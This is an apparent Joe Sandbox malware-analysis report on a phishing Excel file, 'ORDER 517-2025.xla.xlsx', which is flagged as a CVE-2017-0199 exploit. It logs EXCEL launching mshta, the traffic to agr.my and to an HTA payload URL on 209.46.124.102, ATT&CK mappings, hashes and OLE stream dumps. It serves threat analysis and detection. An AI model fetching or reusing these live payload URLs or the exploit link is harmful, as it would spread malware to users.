Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global traffic | HTTP traffic detected:
    GET /mSGalN?&morning HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: agr.my
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Host: 209.46.124.102
Source: unknown | TCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /rules/excel.exe-Production-v19.bundle HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
    Host: otelrules.svc.static.microsoft
Source: global traffic | HTTP traffic detected:
    GET /rules/rule120603v8s19.xml HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
    Host: otelrules.svc.static.microsoft
Source: global traffic | HTTP traffic detected:
    GET /rules/rule120607v1s19.xml HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
    Host: otelrules.svc.static.microsoft
Source: global traffic | DNS traffic detected: DNS query: agr.my
Source: global traffic | DNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: ORDER 517-2025.xla.xlsx | String found in binary or memory: https://agr.my/mSGalN?&morning&h
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | HTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.246.38:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: ORDER 517-2025.xla.xlsx | OLE indicator, VBA macros: true
Source: ORDER 517-2025.xla.xlsxStream path 'MBD00E31B39/\x1Ole' : https://agr.my/mSGalN?&morning&h>X F'NQCt:{&Y1#v3}%S`MRBy96Lba+8fng]&QfN/TV:<y2{Od|2+y60KL9*zplypVnjO9PquZChKNo52HNhFXJoj2NHp98mQdmxJVtOnGyX2c21asMPRsXd7o7D4IqX4uUZSFEkNZXkh4aAZI4jY3pXPocD5CgbrdMw9WpKq5VnGKV2KXPKMA5PgkOUpq3jYho8fVNfxmKneqPR1AEhjUwQN3o7RIZdZM80ZO8i6KQf7B2NIEH9j9DCvy1ISEc]w`n!W=z^
Source: C:\Windows\SysWOW64\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Window title found: microsoft excel okexcel cannot open the file 'order 517-2025.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engine; Classification label: mal56.expl.winXLSX@6/4@4/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\Desktop\~$ORDER 517-2025.xla.xlsx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user~1\AppData\Local\Temp\{28591364-60F0-47BA-9E82-F9182EB1EDCF} - OProcSessId.dat
Source: ORDER 517-2025.xla.xlsx; OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ORDER 517-2025.xla.xlsx; Virustotal: Detection: 28%
Source: ORDER 517-2025.xla.xlsx; ReversingLabs: Detection: 25%
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER 517-2025.xla.xlsx"
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: c2r32.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: ORDER 517-2025.xla.xlsx; Static file information: File size 1263104 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: ORDER 517-2025.xla.xlsx; Initial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: ORDER 517-2025.xla.xlsx; Stream path 'MBD00E31B38/Package' entropy: 7.99513339556 (max. 8.0)
Source: ORDER 517-2025.xla.xlsx; Stream path 'Workbook' entropy: 7.99540760462 (max. 8.0)
Source: C:\Windows\splwow64.exe; Window / User API: threadDelayed 853
Source: C:\Windows\splwow64.exe; Last function: Thread delayed
Source: C:\Windows\splwow64.exe; Thread delayed: delay time: 120000
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information queried: ProcessInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 13 Exploitation for Client Execution | 1 Scripting | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Behavior graph (ID: 1648793; sample: ORDER 517-2025.xla.xlsx; start date: 26/03/2025; architecture: WINDOWS; score: 56). DNS/IP nodes: star-azurefd-prod.trafficmanager.net, shed.dual-low.s-part-0010.t-0009.t-msedge.net, 4 other IPs or domains. Signatures: Multi AV Scanner detection for submitted file; Document exploit detected (process start blacklist hit); Sigma detected: Suspicious Microsoft Office Child Process. EXCEL.EXE started splwow64.exe and mshta.exe, dropped C:\Users\user\...\~$ORDER 517-2025.xla.xlsx, and connected to 209.46.124.102 (49698, 80; SRS-6-Z-7381US, United States), s-part-0010.t-0009.t-msedge.net 13.107.246.38 (443, 49700, 49701; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States) and agr.my 147.79.86.93 (443, 49697; EKSENBILISIMTR, United States). A second EXCEL.EXE process was also started.

Source | Detection | Scanner | Label
ORDER 517-2025.xla.xlsx | 28% | Virustotal |
ORDER 517-2025.xla.xlsx | 25% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://agr.my/mSGalN?&morning | 0% | Avira URL Cloud | safe
https://agr.my/mSGalN?&morning&h | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0010.t-0009.t-msedge.net | 13.107.246.38 | true | false |  | high
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false |  | high
agr.my | 147.79.86.93 | true | false |  | unknown
s-0005.dual-s-msedge.net | 52.123.129.14 | true | false |  | high
otelrules.svc.static.microsoft | unknown | unknown | false |  | high
Name | Malicious | Antivirus Detection | Reputation
https://agr.my/mSGalN?&morning | false | Avira URL Cloud: safe | unknown
https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundle | false |  | high
https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xml | false |  | high
https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xml | false |  | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://agr.my/mSGalN?&morning&h | ORDER 517-2025.xla.xlsx | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
209.46.124.102 | unknown | United States | 7381 | SRS-6-Z-7381US | false
147.79.86.93 | agr.my | United States | 208485 | EKSENBILISIMTR | false
13.107.246.38 | s-part-0010.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1648793
Start date and time: 2025-03-26 08:10:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ORDER 517-2025.xla.xlsx
Detection: MAL
Classification: mal56.expl.winXLSX@6/4@4/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
• Excluded IPs from analysis (whitelisted): 52.109.20.38, 52.109.6.63, 184.31.69.3, 199.232.210.172, 20.52.64.200, 23.204.23.20, 20.189.173.1, 52.123.129.14, 40.126.24.148, 4.175.87.197
• Excluded domains from analysis (whitelisted): onedscolprdwus00.westus.cloudapp.azure.com, slscr.update.microsoft.com, scus-azsc-config.officeapps.live.com, eus2-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, onedscolprdgwc02.germanywestcentral.cloudapp.azure.com, osiprod-eus2-buff-azsc-000.eastus2.cloudapp.azure.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, config.officeapps.live.com, us.configsvc1.live.com.
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:12:47 | API Interceptor | 901x Sleep call for process: splwow64.exe modified
                                          • 212.60.30.63
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 147.79.124.110
                                          http://elcharrousa.comGet hashmaliciousUnknownBrowse
                                          • 147.79.123.22
                                          El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                                          • 45.143.99.2
                                          0YyNtXEF7a.pdfGet hashmaliciousUnknownBrowse
                                          • 45.143.99.2
                                          C74uZ7KpVc.pdfGet hashmaliciousUnknownBrowse
                                          • 45.143.99.2
                                          4.elfGet hashmaliciousUnknownBrowse
                                          • 45.92.107.109
                                          https://lsscleancom-my.sharepoint.com/:f:/g/personal/kenlo_lssclean_com/EhnR6xetq2dAuMrc9U21jwcBJzCdAGjvCuP0qUViMdaBIQ?e=0YIDjA__;!!Dhw9WWooB8bE!tAdRWoDVFYP2IeTWlIzG7WWn-9rmQ8Bcj1TAwSQFkHEKEKRRtghV6HUuVp2qt0crTG1LxmWitv2uFE_jVwUp17lshg$Get hashmaliciousGabagoolBrowse
                                          • 147.79.74.176
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          6271f898ce5be7dd52b0fc260d0662b3Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          a0e9f5d64349fb13191bc781f81f42e1Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                                          • 13.107.246.38
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 13.107.246.38
                                          Payment Advice 24-03-2025.docxGet hashmaliciousUnknownBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousCryptOne, LummaC Stealer, Socks5SystemzBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38
                                          No context
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):118
                                          Entropy (8bit):3.5700810731231707
                                          Encrypted:false
                                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                          MD5:573220372DA4ED487441611079B623CD
                                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <HeartbeatCache/>
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):784
                                          Entropy (8bit):2.7137690747287806
                                          Encrypted:false
                                          SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                                          MD5:09F73B3902CD3D88E04312787956B654
                                          SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                                          SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                                          SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):165
                                          Entropy (8bit):1.7769794087092887
                                          Encrypted:false
                                          SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                          MD5:37BD8218D560948827D3B948CAFA579C
                                          SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                          SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                          SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                          Malicious:true
                                          Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Mar 26 04:05:24 2025, Security: 1
                                          Entropy (8bit):7.982460847573051
                                          TrID:
                                          • Microsoft Excel sheet (30009/1) 47.99%
                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                          File name:ORDER 517-2025.xla.xlsx
                                          File size:1'263'104 bytes
                                          MD5:f9137fe9005de451da58b57301dba5b9
                                          SHA1:5d756a8364f3382703825b71c89247bb2d156f11
                                          SHA256:32df4f4afa4d06c6096d807535d584556cb7dca6234088299106a93a49a8e4ef
                                          SHA512:7b4e958e45047e28649ccd71f1269207b57f6504841aa1fc0a0e6a5ad63b23a34e1264cdebd94513763808acd9957204dd8ae421d9af2772ade2bdb09872a9f1
                                          SSDEEP:24576:vk/BbDqMApAUspxvqbY43WZHzn0M9cWNVDfrsnlCdbPusr:vcRwEpxybY43WF0MtDDTMElW
                                          TLSH:A14523947B80DF77C9A344BC959B8549811AFC807B59CBA3724A735A78313B0866F38F
                                          Icon Hash:35e58a8c0c8a85b9
                                          Document Type:OLE
                                          Number of OLE Files:1
                                          Has Summary Info:
                                          Application Name:Microsoft Excel
                                          Encrypted Document:True
                                          Contains Word Document Stream:False
                                          Contains Workbook/Book Stream:True
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:False
                                          Flash Objects Count:0
                                          Contains VBA Macros:True
                                          Code Page:1252
                                          Author:
                                          Last Saved By:
                                          Create Time:2006-09-16 00:00:00
                                          Last Saved Time:2025-03-26 04:05:24
                                          Creating Application:Microsoft Excel
                                          Security:1
                                          Document Code Page:1252
                                          Thumbnail Scaling Desired:False
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:786432
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                          VBA File Name:Sheet1.cls
                                          Stream Size:977
                                          Attribute VB_Name = "Sheet1"
                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                          Attribute VB_GlobalNameSpace = False
                                          Attribute VB_Creatable = False
                                          Attribute VB_PredeclaredId = True
                                          Attribute VB_Exposed = True
                                          Attribute VB_TemplateDerived = False
                                          Attribute VB_Customizable = True
                                          

                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                          VBA File Name:Sheet2.cls
                                          Stream Size:977
                                          Attribute VB_Name = "Sheet2"
                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                          Attribute VB_GlobalNameSpace = False
                                          Attribute VB_Creatable = False
                                          Attribute VB_PredeclaredId = True
                                          Attribute VB_Exposed = True
                                          Attribute VB_TemplateDerived = False
                                          Attribute VB_Customizable = True
                                          

                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                          VBA File Name:Sheet3.cls
                                          Stream Size:977
                                          Attribute VB_Name = "Sheet3"
                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                          Attribute VB_GlobalNameSpace = False
                                          Attribute VB_Creatable = False
                                          Attribute VB_PredeclaredId = True
                                          Attribute VB_Exposed = True
                                          Attribute VB_TemplateDerived = False
                                          Attribute VB_Customizable = True
                                          

                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                          VBA File Name:ThisWorkbook.cls
                                          Stream Size:985
                                          Attribute VB_Name = "ThisWorkbook"
                                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                          Attribute VB_GlobalNameSpace = False
                                          Attribute VB_Creatable = False
                                          Attribute VB_PredeclaredId = True
                                          Attribute VB_Exposed = True
                                          Attribute VB_TemplateDerived = False
                                          Attribute VB_Customizable = True
                                          

                                          General
                                          Stream Path:\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.25248375192737
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:244
                                          Entropy:2.889430592781307
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                          General
                                          Stream Path:\x5SummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:200
                                          Entropy:3.2423021151327975
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . Z L . . . . . . . . . .
                                          General
